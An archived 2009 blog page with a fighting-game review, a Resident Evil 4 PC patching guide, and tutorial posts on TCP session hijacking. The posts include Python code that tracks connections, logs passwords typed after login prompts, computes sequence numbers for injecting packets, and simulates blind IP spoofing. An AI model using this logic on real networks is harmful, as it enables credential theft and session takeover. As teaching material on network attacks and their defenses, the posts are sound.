Showing newest 20 of 23 posts from 7/1/09 - 8/1/09.

Friday, July 31, 2009

King of Fighters 12, an honest review

Let's go back to the early 90's. The Street Fighter series is churning up arcades and fans of fighting games have gone berserk over Capcom's offering. Enter SNK: King of Fighters is born, and the series originally stood as the top contender against the legendary Street Fighter series. With the launch of King of Fighters 12, I have been enthusiastic enough to give it a try, as I'm a fighting game maniac, and it's time to test whether it matches the expectations of fans and critics alike.

Prologue

SNK's King of Fighters 12 has been touted as the reboot of the series, meant to restore it to its former glory. This theme emerged from the game's brand new style of characters and sprites, which make up the first overall visual overhaul the series has had in ages, and from the hope that it would do for King of Fighters what Street Fighter 4 did for the Street Fighter series. However, to my dismay, this game is a disappointment. This 3-on-3 2D fighter sports a fairly solid fighting engine, much like the older KOFs, but everything surrounding that engine is either lackluster or broken. Or both. It's a shame that the one game aimed at the rebirth of a dying franchise has been rushed and lacks developer effort.

Characters

As we all know, the characters are the core of a fighting game; after all, they give the game its identity. KOF sports all the nostalgic series stars: Terry Bogard, Kim Kaphwan, Iori Yagami and more. However, series icon Mai Shiranui is missing (I miss her hot figure :P).

KOF12 provides you with almost all the classic characters

Gameplay,Graphics and presentation

It follows the old-school rules of the series: every character has a Light Punch, Heavy Punch, Light Kick and Heavy Kick. These form the basic attacks, and you can combine them to execute all sorts of complex combos. By pressing both Light Punch and Light Kick you can evade an attack, and there is another move executed by hitting both punch buttons. You can counter heavy attacks by hitting both heavy buttons, which can knock your opponent away and give your fighter some room to breathe. You can parry an incoming strike by hitting the heavies while holding the D-pad, which performs a Guard Attack.

Terry is back, blasting away Ryo in King of Fighters 12

As with all fighting games, every character has their own set of special and super moves. One of the new systems KOF introduces is the Critical Counter system. Fill up your gauge during a bout and, once it is full, counter your opponent's attack with a Heavy Punch or Heavy Kick, which activates a special combo state where you can release all sorts of combos and chain attacks together. It was a real blast (I like real damage).

Iori rulez!!! in King of Fighters 12

When it comes to selecting stages, I was disappointed to find there are only six stages to choose from, two of which are just day/night variations of each other. And there is just one soundtrack for the whole game! Couldn't they tune it all together?

KOF12 vs BlazBlue

The core battle system in KOF XII is faithful to the series; however, it feels bland compared to Street Fighter 4, BlazBlue and the Guilty Gear series. The new character animations are praiseworthy, but there are resolution issues, as the sprites seem pixelated once combat starts.

Modes

KOF XII can be quite fun when you mash it out with a friend locally, but it has some serious issues on both the PS3 and 360. No unlockables, just two modes (arcade and multiplayer), no story and survival modes... well, WHAT WERE THEY THINKING?!! The game's menu navigation is broken: for example, you can't back out of the character selection screen once you dive in, the game loads at odd points during menu navigation, and the training mode lacks a "reset" button.

Multiplayer

LAG LAG LAG... that's how I can describe the KOF12 multiplayer as of now; the online multiplayer is unplayable. They released patches, but they too suffered from horrendous lag, and in short it ruins the multiplayer experience, as most players nowadays match their skills online. Also, the patch they made me install (forcefully, and I'M SERIOUS!!!) was an odd 700+ MB file that installs and updates game data which you would normally install from the disc. One more act of dev-foolishness...

Epilogue

King of Fighters XII is fun to play when you're fighting a buddy locally, but everything else about the game is seriously lacking. This is not the rebirth you have been waiting for and SNK was hoping for, as smoothly animated sprites alone can't make a lackluster game with broken online support a top dog. I would rather recommend you get your hands on BlazBlue, play Street Fighter 4 and wait for Tekken 6 if you are a hardcore fighting fan.

Final Score: 27/40

Posted by XERO. ALL RIGHTS RESERVED.

 


Sunday, July 26, 2009

Run Resident Evil 4 on PC perfectly

Resident Evil 4 is a legendary game, and that's not an overestimation. Recently I got the Asian edition of the game and I was shocked to see the over-the-top problems: crappy graphics, bad controls with no mouse support and, worse, no dynamic lighting. It was a crappy port of an excellent game. Ubisoft ported Capcom's prized baby to the PC, and I thought they made it into something only monkeys could play.

Ubisoft got the "rave" comments about their port and handled the above issues by releasing a patch which addressed some of the problems posed by the original conversion. However, here too they messed it up again by releasing the patch only for the European version, to my knowledge (please correct me if I'm wrong), so most of the die-hard fans and gamers (like me) were deprived of a playable port of RE4 even though we had original DVDs. Also, the official patch caused some machines to crash and some saved games to get erased. Overall it showed the carelessness of Capcom and Ubisoft, two industry giants who have given us quality games for over a decade.

See the changes after you mod the game

However, this was not something that could not be handled by the loyal and large fanbase RE4 commands. Fans of the series modded the game to their liking and have made their mods available for everyone out there. I played RE4 both using 3D Analyzer and using the conventional method, and I would like to share how I did it and how I made it run. It's a long road, so be prepared to make some good backups.

You will need-

  1. Official RE4 Patch European edition
  2. Asian to European Patch
  3. Mouse Patch version 2
  4. Keyboard patch
  5. Lots of time

How to do that -

  1. First identify the version of RE4 you are using: if the main screen says Resident Evil 4, you are lucky, you have the European version of the game, so skip to step 5. If instead it says Biohazard 4, then get ready for some hardship.
  2. Install the game as usual.
  3. Download the unofficial Asian to European patch and install it. Make sure to back up your main game EXE files first.
  4. Open the registry editor (regedit) and navigate to
    • HKEY_LOCAL_MACHINE\SOFTWARE\CAPCOM\Biohazard 4
    • and rename the key (export it first so you can restore it) to
    • HKEY_LOCAL_MACHINE\SOFTWARE\CAPCOM\Resident Evil 4
  5. Now download the official European patch from Ubisoft and install it.
  6. Now download the Mouse patch version 2.0 and the Keyboard patch and extract all the files into the install directory. Double-click the patch files and restart your PC.
  7. You are now good to go. Heed my advice: play the game the way it's meant to be played, get a good controller, grab a cup of coffee and enjoy.

 

Posted by XERO. ALL RIGHTS RESERVED.


Saturday, July 25, 2009

Programs that perform Session Hijacking

There are several programs available that perform session hijacking, though few of them (or their source code) are publicly available for doing a TCP hijack. The following belong to this category:

  • Juggernaut

  • Hunt

  • TTY Watcher

  • IP Watcher

  • T-Sight

Hacking Tool: Juggernaut
  • Juggernaut is a network sniffer that can also be used to hijack TCP sessions. It runs on Linux and has a Trinux module as well.

  • Juggernaut can be set to watch all network traffic on the local network, or it can be given a keyword such as "password" to look out for.

  • The main function of this program is to maintain a connection database: information about the various TCP sessions occurring on the network.

  • The attacker can see all the sessions and can pick the one he wants to hijack.

    For example, Juggernaut can be configured to wait for the login prompt and then record the network traffic that follows (usually capturing the password). This way the tool can capture certain types of traffic if it is simply left running for a few days, after which the attacker picks up the log file containing the recorded traffic. This differs from regular network sniffers, which record all network traffic and so produce extremely large log files (which are easier to detect).

    However, the main feature of this program is its ability to maintain a connection database. This means an attacker can watch all the TCP-based connections made on the local network and possibly "hijack" a session. Once a connection is made, the attacker can watch the entire session (for a telnet session, this means the attacker sees a "playback" of the entire session, as if looking at the telnet window).

    While watching an active session, the attacker can do more than passively observe it. Juggernaut is capable of resetting the connection (terminating it) and of hijacking it, allowing the attacker to insert commands into the session or even to take the session completely into his own hands (resetting the connection on the legitimate client).
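Juggernaut itself is not reproduced on this page. The following is an added example, not the tool's own code, showing the two mechanisms described above in pure Python: a parser for raw IPv4/TCP headers feeding a connection database that tracks each side's next sequence number (the SEQ/ACK an injector needs), plus a keyword trigger that records whatever the client sends right after a "Password:" prompt. The telnet exchange, addresses and port numbers are constructed test input, not captured traffic.

```python
"""Juggernaut-style connection tracking (added example, not the tool's code).

Parses raw IPv4/TCP packets, keeps a connection database keyed by the
client's 4-tuple with each side's next expected sequence number, and arms
a keyword trigger so the client's reply to a "Password:" prompt is logged."""
import socket
import struct

FIN, SYN, RST, PSH, ACK = 0x01, 0x02, 0x04, 0x08, 0x10
MASK32 = 0xFFFFFFFF


def parse_ipv4_tcp(pkt):
    """Return (src, sport, dst, dport, seq, ack, flags, payload); checksums are not verified."""
    ver_ihl, _tos, total_len, _id, _frag, _ttl, proto, _csum, src, dst = struct.unpack(
        "!BBHHHBBH4s4s", pkt[:20])
    if ver_ihl >> 4 != 4 or proto != 6:
        raise ValueError("not an IPv4/TCP packet")
    tcp = pkt[(ver_ihl & 0x0F) * 4:total_len]
    sport, dport, seq, ack, off, flags, _win, _csum, _urg = struct.unpack("!HHLLBBHHH", tcp[:20])
    return (socket.inet_ntoa(src), sport, socket.inet_ntoa(dst), dport,
            seq, ack, flags, tcp[(off >> 4) * 4:])


def build_packet(src, sport, dst, dport, seq, ack, flags, payload=b""):
    """Constructed test input: a minimal IPv4/TCP packet with zero checksums."""
    tcp = struct.pack("!HHLLBBHHH", sport, dport, seq, ack, 5 << 4, flags, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    return ip + tcp


class ConnectionDB:
    def __init__(self, keyword=b"password:"):
        self.conns = {}      # (client_ip, client_port, server_ip, server_port) -> state
        self.keyword = keyword.lower()
        self.log = []        # (connection key, payload captured after the keyword)

    def feed(self, pkt):
        src, sport, dst, dport, seq, ack, flags, payload = parse_ipv4_tcp(pkt)
        key, rev = (src, sport, dst, dport), (dst, dport, src, sport)
        if flags & SYN and not flags & ACK:            # client SYN opens the entry
            self.conns[key] = {"state": "SYN_SENT", "next": {}, "last_ack": {}, "armed": False}
        ck = key if key in self.conns else rev
        if ck not in self.conns:
            return None                                 # opened before we started sniffing
        c, sender = self.conns[ck], (src, sport)
        # what this sender will use as its next SEQ: seq + payload bytes (+1 for SYN and FIN)
        c["next"][sender] = (seq + len(payload) + bool(flags & SYN) + bool(flags & FIN)) & MASK32
        if flags & ACK:
            c["last_ack"][sender] = ack
        if flags & RST:
            c["state"] = "RESET"
        elif flags & FIN:
            c["state"] = "CLOSING"
        elif flags & SYN and flags & ACK:
            c["state"] = "SYN_RECEIVED"
        elif c["state"] == "SYN_RECEIVED" and flags & ACK:
            c["state"] = "ESTABLISHED"
        # keyword trigger: once the server has shown the prompt, log the client's next payload
        if payload and c["armed"] and sender == ck[:2]:
            self.log.append((ck, payload))
            c["armed"] = False
        if payload and self.keyword in payload.lower():
            c["armed"] = True
        return ck

    def hijack_params(self, key):
        """(SEQ, ACK) an attacker spoofing the client must put on an injected segment."""
        c = self.conns[key]
        return c["next"][key[:2]], c["next"][key[2:]]


def demo():
    """Constructed telnet-style login between 10.0.0.5 and 10.0.0.9 (not captured traffic)."""
    client, server = ("10.0.0.5", 40000), ("10.0.0.9", 23)
    cs, ss = 1000, 5000                                  # initial sequence numbers
    db = ConnectionDB()
    for pkt in [
        build_packet(*client, *server, cs, 0, SYN),
        build_packet(*server, *client, ss, cs + 1, SYN | ACK),
        build_packet(*client, *server, cs + 1, ss + 1, ACK),
        build_packet(*server, *client, ss + 1, cs + 1, PSH | ACK, b"login: "),
        build_packet(*client, *server, cs + 1, ss + 8, PSH | ACK, b"alice\r\n"),
        build_packet(*server, *client, ss + 8, cs + 8, PSH | ACK, b"Password: "),
        build_packet(*client, *server, cs + 8, ss + 18, PSH | ACK, b"hunter2\r\n"),
    ]:
        db.feed(pkt)
    return db, (*client, *server)


if __name__ == "__main__":
    db, key = demo()
    print(db.conns[key]["state"], db.hijack_params(key), db.log)
```

The connection table is the part that matters for a hijack: after the constructed exchange the entry records that the client's next byte is sequence number 1017 and the server's is 5018, which is exactly the SEQ/ACK pair a spoofed command sent "as the client" must carry to be accepted.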


---Regards,
Amarjit Singh

Sequence Numbers - crucial to hijacking a session

Sequence Numbers
  • Sequence Numbers are very important to provide reliable communication but they are also crucial to hijacking a session.

  • Sequence numbers are a 32-bit counter, which means the value can be any of over 4 billion possible combinations.

  • The sequence numbers tell the receiving machine in what order the received bytes belong, so that the data stream can be reassembled correctly.

  • Therefore an attacker must successfully guess the sequence number to hijack a session.

TCP provides a full duplex reliable stream connection between two end points. A connection is uniquely defined by the IP address of sender, TCP port number of the sender, IP address of the receiver and TCP port number of the receiver.

Every byte that is sent by a host is marked with a sequence number and is acknowledged by the receiver using this sequence number. The sequence number for the first byte sent is computed during the connection opening. It changes for any new connection based on rules designed to avoid reuse of the same sequence number for two different sessions of a TCP connection.

We have seen the increment of the sequence number in our discussion of the three-way handshake. What happens if the sequence number is predictable? When the TCP sequence is predictable, an attacker can send packets that are forged to appear to come from a trusted computer.

The next step taken was to tighten OS implementations of TCP and introduce randomness into the ISN. This was done by using pseudo-random number generators (PRNGs) to add some randomness to the ISNs used for TCP connections. However, adding a series of random increments together provided insufficient variance in the range of likely ISN values, thereby allowing an attacker to disrupt or hijack existing TCP connections or spoof future connections against vulnerable TCP/IP stack implementations.

This implied that systems relying on random increments to make ISNs harder to guess were still vulnerable to statistical attack: given enough samples, the distribution of the next ISN becomes narrow enough to search, because the randomness comes from an algorithm internal to the particular operating system. Once the ISN has been agreed, the first data byte is numbered ISN+1 and every further byte advances the counter, so an attacker who knows the ISN and how many bytes have been exchanged can compute the sequence number currently in use. This makes injecting data into the communication stream possible.

Threat

If a sequence number within the receive window is known, an attacker can inject data into the session stream or choose to terminate the connection. If the attacker knows the initial sequence number and how many bytes have been transmitted in the session thus far, he can send a single packet to inject data or kill the session.

As this is a difficult proposition, the attacker can instead guess a suitable range of sequence numbers and send out a number of packets with different sequence numbers falling within that range. Since the receiver accepts any segment whose sequence number falls inside its receive window, it is likely that at least one packet will be accepted by the server. This way the attacker need not send a packet for every sequence number, but can send packets with sequence numbers spaced a window-size apart. But how does he know how many packets to send?

This is obtained by dividing the range of sequence numbers to be covered by the window size used as the increment. Why was this possible despite the introduction of PRNGs? The problem lay in the use of increments themselves, random or otherwise, to advance an ISN counter, making statistical guessing practical. The result is that remote attackers can perform session hijacking or disruption by injecting a flood of packets with a range of sequence numbers, one of which may match what the receiver expects. The more random the ISNs are, the more difficult these attacks become.
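As an added example (not from the original post), the arithmetic above in Python: the receiver-side acceptance test with 32-bit wraparound, the ISN+1+bytes-sent rule for the sequence number currently in use, the probe count obtained by dividing the uncertainty range by the window size, and a check that probes spaced one window apart really do cover every candidate value. The window sizes and uncertainty ranges are illustrative, not measurements of any stack.

```python
"""Sequence-number acceptance and the cost of guessing (added example).

A segment is accepted when its sequence number lies in the receiver's window
[RCV.NXT, RCV.NXT + RCV.WND). An attacker who can only bound RCV.NXT to a
range of `uncertainty` values does not need one probe per value: aiming one
probe at the top of each window-sized slice covers the whole range."""
MOD = 1 << 32


def seq_in_window(seq, rcv_nxt, rcv_wnd):
    """RFC 793 acceptance test for a segment's first byte, with 32-bit wraparound."""
    return (seq - rcv_nxt) % MOD < rcv_wnd


def current_seq(isn, bytes_sent):
    """Sequence number in use after the handshake: ISN + 1 (for the SYN) + bytes already sent."""
    return (isn + 1 + bytes_sent) % MOD


def probes_needed(uncertainty, rcv_wnd):
    """ceil(uncertainty / rcv_wnd): one probe per window-sized slice of the candidate range."""
    return -(-uncertainty // rcv_wnd)


def probe_sequence(low, uncertainty, rcv_wnd):
    """Sequence numbers to try when RCV.NXT is somewhere in [low, low + uncertainty).
    A probe with SEQ s is accepted for any RCV.NXT in (s - rcv_wnd, s], so each probe
    sits at the top of its slice: low + rcv_wnd - 1, low + 2*rcv_wnd - 1, ..."""
    return [(low + (i + 1) * rcv_wnd - 1) % MOD
            for i in range(probes_needed(uncertainty, rcv_wnd))]


def first_hit(rcv_nxt, rcv_wnd, low, uncertainty):
    """Index of the first probe the receiver would accept, or None if the range missed."""
    for i, s in enumerate(probe_sequence(low, uncertainty, rcv_wnd)):
        if seq_in_window(s, rcv_nxt, rcv_wnd):
            return i
    return None


def attack_cost(rcv_wnd=8192):
    """Probe counts for three degrees of ISN knowledge (illustrative ranges, not measurements)."""
    return {
        "exact ISN and byte count": probes_needed(1, rcv_wnd),
        "ISN known to within 2**20": probes_needed(2 ** 20, rcv_wnd),
        "fully random 32-bit ISN": probes_needed(MOD, rcv_wnd),
    }


if __name__ == "__main__":
    print(attack_cost())
    print(first_hit(1_000_000, 8192, 990_000, 50_000))
```

With an 8192-byte window the three cases cost 1, 128 and 524288 probes respectively, which is the quantitative form of "the more random the ISNs are, the more difficult these attacks become": a truly random 32-bit ISN still leaves a blind attacker a half-million-packet flood per attempt, while a stack whose ISN can be bounded to a few hundred thousand values is beaten in a handful of packets.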


---Regards,
Amarjit Singh

Types of session Hijacking


There are two types of hijacking attacks:

  1. Active

    In an active attack, an attacker finds an active session and takes over.

  2. Passive

    With a passive attack, an attacker hijacks a session, but sits back and watches and records all of the traffic that is being sent forth.

Session hijacking can be active or passive in nature depending on the degree of involvement of the attacker in the attack. The essential difference between an active and passive hijack is that while an active hijack takes over an existing session, a passive attack monitors an ongoing session.

Generally a passive attack uses sniffers on the network, allowing the attacker to obtain information such as user IDs and passwords so that he can later log on as that user and claim his privileges. Password sniffing is only the simplest attack that can be performed once raw access to a network is obtained. Countermeasures range from identification schemes such as one-time passwords (e.g. S/Key) to ticket-based authentication (such as Kerberos). While these may keep sniffing from yielding productive results, they do not protect the network from an active attack as long as the data itself is neither digitally signed nor encrypted.

In an active attack, the attacker takes over an existing session by either tearing down the connection on one side of the conversation or by actively participating by being the man-in-the-middle. These have been discussed at length under the discussion covering the various steps involved in a session hijack.

This requires the ability to predict the sequence number before the target can respond to the server. Sequence number attacks have become much less likely because OS vendors have changed the way initial sequence numbers are generated. The old way was to add a constant value to the next initial sequence number; newer mechanisms use a randomized value for the initial sequence number.


---Regards,
Amarjit Singh

Steps in Session Hijacking

  1. Tracking the session

  2. Desynchronizing the connection

  3. Injecting the attacker's packet

How does an attacker go about hijacking a session? The hijack can be broken down into three broad phases, the second of which can be carried out either by desynchronizing or by resetting the connection.

  • Tracking the connection

    The attacker waits to find a suitable target and host. He uses a network sniffer to track the victim and host, or identifies a suitable target by scanning with a tool such as nmap for hosts with trivial TCP sequence prediction. This is done so that the correct sequence and acknowledgement numbers are captured, because TCP checks packets by their sequence and/or acknowledgement numbers. These will later be used by the attacker in crafting his own packets.

  • Desynchronizing the connection

    A desynchronized state is one where a connection between the target and host is in the established state, or in a stable state with no data transmission, and the server's sequence number is not equal to the client's acknowledgement number, or the client's sequence number is not equal to the server's acknowledgement number. To desynchronize the connection between the target and host, the sequence number or the acknowledgement number (SEQ/ACK) of the server must be changed. This can be done by sending null data to the server so that the server's SEQ/ACK numbers advance while the target machine does not register the increment.

    The desynchronization is preceded by the attacker monitoring the session without interference until an opportune moment, when he sends a large amount of "null data" to the server. This data serves only to change the ACK number on the server and does not affect anything else. The attacker does likewise to the target. Now both the server and the target are desynchronized.

  • Resetting the connection

    Another approach is to send a reset flag to the server and tearing down the connection on the server side. This is ideally done in the early setup stage. The goal of the attacker is to break the connection on the server side and create a new one with different sequence number.

    The attacker listens for a SYN/ACK packet from the server to the host. On detecting the packet, he sends an RST to the server and a SYN packet with exactly the same parameters such as port number but a different sequence number. The server on receiving the RST packet, closes connection with the target, but initiates another one based on the SYN packet - with a different sequence number on the same port. Having opened a new connection, the server sends a SYN/ACK packet to the target for acknowledgement. The attacker detects (but does not intercept) this and sends back an ACK packet to the server. Now, the server is in the established state. The target is oblivious to the conversation and has already switched to the established state when it received the first SYN/ACK packet from the server. Now both server and target are in desynchronized but established state.

    This can also be done using a FIN flag, but this will cause the server to respond with an ACK and give away the attack through an ACK storm. The storm results from a flaw inherent in this method of hijacking a TCP connection: when a host receives an unacceptable packet, it acknowledges it by sending the sequence number it expects, using its own sequence number. That packet is itself unacceptable to the other side and generates another acknowledgement, which in turn generates another, creating a supposedly endless loop for every data packet sent. The mismatch in SEQ/ACK numbers results in excess network traffic, with both the server and the target trying to verify the right sequence. Since these pure acknowledgements carry no data, they are not retransmitted if lost; and because TCP runs over the unreliable IP, the loss of a single packet puts an end to the unwanted conversation between server and target.

    The desynchronizing stage is added in the hijack sequence so that the target host is kept in the dark about the attack. Without desynchronizing, the attacker will still be able to inject data to the server and even keep his identity by spoofing an IP address. However, he will have to put up with the server's response being relayed to the target host as well.

  • Injecting the attacker's packet

    Now that the attacker has interrupted the connection between the server and target, he can choose to either inject data into the network or actively participate as the "man in the middle", and pass data from the target to the server, and vice versa, reading and injecting data as he sees fit.

Illustration:

  1. Alice opens a telnet session to Bob and starts doing some work.

  2. Eve observes the connection between Alice and Bob using a sniffer that is integrated into her hijacking tool. Eve makes a note of Alice's IP address and her hijacking software samples the TCP sequence numbers of the connection between Alice and Bob.

  3. Eve launches a DoS attack against Alice to stop Alice doing further work on Bob and to prevent an ACK storm from interfering with her attack.

  4. Eve generates spoofed packets with the correct TCP sequence numbers and connects to Bob.

  5. Bob thinks that he is still connected to Alice.

  6. Alice notices a lack of response from Bob and blames it on the network.

  7. Eve finds herself at a root prompt on Bob. She issues some commands to make a backdoor and uses the sniffer to observe the responses from Bob.

  8. After covering her tracks, Eve logs out of Bob and ceases the DoS attack against Alice.

  9. Alice notices that her connection to Bob has been dropped.

  10. Eve uses her backdoor to get directly into Bob.

---Regards,
Amarjit Singh

Spoofing Vs Hijacking

A spoofing attack differs from a hijack in that the attacker is not actively taking another user offline to perform the attack; he pretends to be another user or machine to gain access.

An early record of the ideas behind session hijacking comes from Robert T. Morris, who in 1985 described how the security of a TCP/IP connection rested in its sequence numbers and how those numbers could be predicted on 4.2BSD. He is better known for the Morris Worm episode that affected nearly 6000 computers on the ARPANET in 1988, ARPANET's first automated network security incident. Morris wrote a program that would connect to another computer, find and use one of several vulnerabilities to copy itself to that second computer, and begin to run the copy of itself at the new location. Both the original code and the copy would then repeat these actions against other computers on the ARPANET.

Though the worm itself spread through flaws in sendmail and fingerd and through rsh trust relationships rather than by sequence number prediction, it is Morris's earlier observation about predictable sequence numbers that underlies the attacks discussed here.

Blind IP spoofing involves predicting the sequence numbers that the victimized host will send in order to create a connection which appears to originate from the host. Before exploring blind spoofing further, let us take a look at sequence number prediction.

TCP sequence numbers are used to provide flow control and data integrity for TCP sessions. Every byte in a TCP session has a unique sequence number. Moreover, every TCP segment carries the sequence number of its first byte in the segment header. The initial sequence number (ISN) does not start at zero for each session. Instead, the participants specify initial sequence numbers as part of the handshake process, a different ISN for each direction, and begin numbering the bytes sequentially from there.

Blind IP spoofing relies on the attacker's ability to predict sequence numbers, as he is unable to sniff the communication between the two hosts by virtue of not being on the same network segment. He cannot spoof a trusted host on a different network and see the reply packets, because the packets are not routed back to him. He cannot resort to ARP cache poisoning either, because routers do not forward ARP broadcasts across the Internet. As he cannot see the replies, he is forced to anticipate the responses from the victim server and to prevent the trusted host he is impersonating from answering the unexpected SYN/ACK with an RST (for example by flooding it). The attacker then inserts himself into the communication by predicting what sequence number the remote host is expecting. This has been used extensively to exploit trust relationships between users and remote machines; the affected services include NFS, telnet, IRC, etc.

IP spoofing is relatively easy to accomplish. The only pre-requisite on part of the attacker is to have root access on a machine in order to create raw packets. In order to establish a spoofed connection the attacker must know what sequence numbers are being used. Therefore, IP spoofing forces the attacker to have to predict the next sequence number.

The attacker can use "blind" hijacking, to send a command, but can never see the response. However, a common command would be to set a password allowing access from somewhere else on the net. The attack became famous when Kevin Mitnick used it to hack into Tsutomu Shimomura's computer network. The attack exploited the trust that Shimomura's machines had with the other network. By SYN flooding the trusted host, Mitnick was able to establish a short connection which was then used to gain access through traditional methods.

With Hijacking an attacker is taking over an existing session, which means he is relying on the legitimate user to make a connection and authenticate. Then take over the session.

With IP spoofing there is no existing session whose sequence numbers must be tracked; the attacker only has to predict the ISN the server will choose for the new connection, since no session is currently open with that IP address. The traffic would get back to the attacker only through source routing, where the attacker tells the network how to route the input and output of a session and simply sniffs it as it passes by him. Source routing is an IP option used mainly by network managers to check connectivity. Normally, when an IP packet leaves a system, its path is controlled by the routers and their current configuration; source routing provides a means to override that control. For this reason most routers and hosts today drop source-routed packets by default.

When an attacker uses captured, reverse-engineered or brute-forced authentication tokens to take control of a legitimate user's session while that user is still in session, the session is said to be hijacked. As a result, the legitimate user may lose access or be deprived of the normal functionality of the session, while the attacker now acts with the user's privileges.

Most authentication occurs at the beginning of a TCP session, which is what makes it possible for an attacker to gain access to a target machine by taking over after that point. A popular method attackers adopt is to use source-routed IP packets. This allows an attacker to become part of the target-host conversation by forcing the IP packets to pass through his system. The attacker can also carry out the classic man-in-the-middle attack using a sniffing program to monitor the conversation.

In TCP session hijacking, a familiar aspect of the attacks is the carrying out of a denial-of-service (DoS) attack against the target / host to prevent it from responding by either forcing the machine to crash, or against the network connection to result in a heavy packet loss (e.g. SYN flood).

Session hijacking is even more difficult than IP address spoofing. In session hijacking, John would seek to insert himself into a session that Jane already had set up with \\Mail. John would wait until Jane established a session, then knock her off the air by some means and pick up the session as though he was her. As before, John would send a scripted set of packets to \\Mail but would not be able to see the responses. To do this, he would need to know the sequence number in use when he hijacked the session, which could be calculated knowing the ISN and the number of packets that have been exchanged.

Successful session hijacking is extremely difficult and only possible when a number of factors are under the attacker's control. Knowledge of the ISN would be the least of John's challenges. For instance, he would need a way to knock Jane off the air at will. He also would need a way to know the exact status of Jane's session at the moment he mounted his attack. Both of these require that John have far more knowledge about and control over the session than normally would be possible.

However, IP address spoofing attacks can only be successful if IP addresses are used for authentication. An attacker cannot perform IP address spoofing or session hijacking if per-packet integrity checking is performed. Similarly, neither IP address spoofing nor session hijacking yield anything useful if the session uses encryption such as SSL or PPTP, as the attacker will not be able to participate in the key exchange; note, though, that encryption above TCP does not stop an attacker who knows the sequence numbers from tearing the connection down with a RST, it only stops him from reading or injecting meaningful data. Therefore the essential requirements to hijack non-encrypted TCP communications can be listed as: presence of non-encrypted session-oriented traffic, the ability to recognise TCP sequence numbers and predict the next sequence number (NSN), and the capability to spoof a host's MAC or IP address in order to receive communications not destined for the attacker's host. If the attacker is on the local segment, he can sniff and predict the ISN+1 number and have the traffic routed back to him by poisoning the ARP cache.
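The blind-spoofing handshake from the Mitnick/Shimomura discussion above and the ISN predictability discussed in the sequence-number post, as an added Python simulation that is not part of the original text: a server that trusts by source address, a stepping ISN generator (the per-connection step is an invented constant, not a real stack's value), an RFC 6528-style generator that mixes a keyed hash of the connection tuple into the ISN, and an attacker who samples the ISN from his own address, extrapolates, and completes the handshake as the trusted host without ever seeing the SYN/ACK. The IP addresses and the trusted host are assumptions.

```python
"""Blind IP spoofing vs ISN quality (added example, not from the original text).

A server that trusts clients by source address (rlogin/rsh style) is modelled
with a pluggable ISN generator. The attacker never sees the SYN/ACK, which is
routed to the host he impersonates, so he must predict the server's ISN to
send a valid third handshake packet."""
import hashlib
import hmac

MOD = 1 << 32
TRUSTED_HOST = "10.0.0.1"       # assumed address the server trusts without a password
ATTACKER_HOST = "198.51.100.7"  # assumed attacker address (documentation range)


def stepping_isn(step=64000):
    """Toy generator in the early-BSD style: a constant step per connection (step is invented)."""
    state = {"isn": 0x12345}

    def gen(src_ip, src_port):
        state["isn"] = (state["isn"] + step) % MOD
        return state["isn"]
    return gen


def rfc6528_isn(secret, step=64000):
    """ISN = M + F(src_ip, src_port, secret): a counter plus a keyed hash of the peer
    (the server side of the 4-tuple is fixed here), so samples taken from one peer
    say nothing about the ISN another peer will be given."""
    state = {"m": 0}

    def gen(src_ip, src_port):
        state["m"] = (state["m"] + step) % MOD
        f = hmac.new(secret, f"{src_ip}:{src_port}".encode(), hashlib.sha256).digest()
        return (state["m"] + int.from_bytes(f[:4], "big")) % MOD
    return gen


class Server:
    def __init__(self, isn_gen):
        self.isn_gen = isn_gen
        self.half_open = {}            # (src_ip, src_port) -> (our ISN, their ISN)
        self.trusted_sessions = []

    def syn(self, src_ip, src_port, client_isn):
        """Handle a SYN. The SYN/ACK is addressed to src_ip, whoever really sent the SYN."""
        isn = self.isn_gen(src_ip, src_port)
        self.half_open[(src_ip, src_port)] = (isn, client_isn)
        return {"to": src_ip, "seq": isn, "ack": (client_isn + 1) % MOD}

    def ack(self, src_ip, src_port, seq, ack):
        """Third handshake packet: accepted only if it acknowledges our ISN exactly."""
        isn, client_isn = self.half_open.pop((src_ip, src_port), (None, None))
        ok = isn is not None and ack == (isn + 1) % MOD and seq == (client_isn + 1) % MOD
        if ok and src_ip == TRUSTED_HOST:
            self.trusted_sessions.append((src_ip, src_port))   # shell granted on address alone
        return ok


def blind_spoof(server):
    """Sample the ISN twice from the attacker's own address (those SYN/ACKs he does see),
    extrapolate the step, then complete a handshake as TRUSTED_HOST without seeing its SYN/ACK.
    The trusted host is assumed SYN-flooded, so it never answers that SYN/ACK with a RST."""
    a = server.syn(ATTACKER_HOST, 40000, client_isn=1)["seq"]
    b = server.syn(ATTACKER_HOST, 40001, client_isn=1)["seq"]
    predicted = (b + (b - a)) % MOD
    spoofed_isn = 0xABCD
    server.syn(TRUSTED_HOST, 1023, client_isn=spoofed_isn)      # reply goes to the silenced host
    return server.ack(TRUSTED_HOST, 1023, (spoofed_isn + 1) % MOD, (predicted + 1) % MOD)


if __name__ == "__main__":
    print("stepping ISN hijacked:", blind_spoof(Server(stepping_isn())))
    print("RFC 6528 ISN hijacked:", blind_spoof(Server(rfc6528_isn(b"per-boot secret"))))
```

Against the stepping generator two probes are enough: the third ISN is exactly the second plus the observed difference, and the server grants a trusted session to an address whose owner never sent a packet. Against the hashed generator the same extrapolation lands on an unrelated 32-bit value and the third packet is discarded; the attacker is back to the flood-of-guesses cost worked out in the sequence-number post.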

---Regards,
Amarjit Singh

Understanding session hijacking

  • Understanding the flow of message packets over the Internet by dissecting the TCP stack.

  • Understanding the security issues involved in the use of IPv4 standard

  • Familiarizing with the basic attacks possible due to the IPv4 standard.

  • At its simplest level, TCP hijacking relies on the violation of trust relationships between two interacting hosts. Before we go into the details of session hijacking, let us take a look at the TCP stack and the IPv4 protocol, to understand why this attack is possible.

    Consider the everyday scenario where you access the Internet with your browser, say IE. IE works at the application layer and produces the data to be sent across the Internet. The transport protocol comes into action in the next layer, aptly called the transport layer, where the appropriate protocol header is added; here it is a TCP header, as TCP is the protocol being used. TCP ensures the reliability of data transported over inherently unreliable communication platforms and also controls many aspects of the initiation and management of communication between the two hosts. In the network layer the IP header is added to form the datagram, and routers offer the functionality for it to hop from source to destination, one hop at a time. The final layer, which communicates with the physical hardware, is the data link layer. It is responsible for the delivery of frames from the source to the destination over a physical communication medium, which in this case is Ethernet.

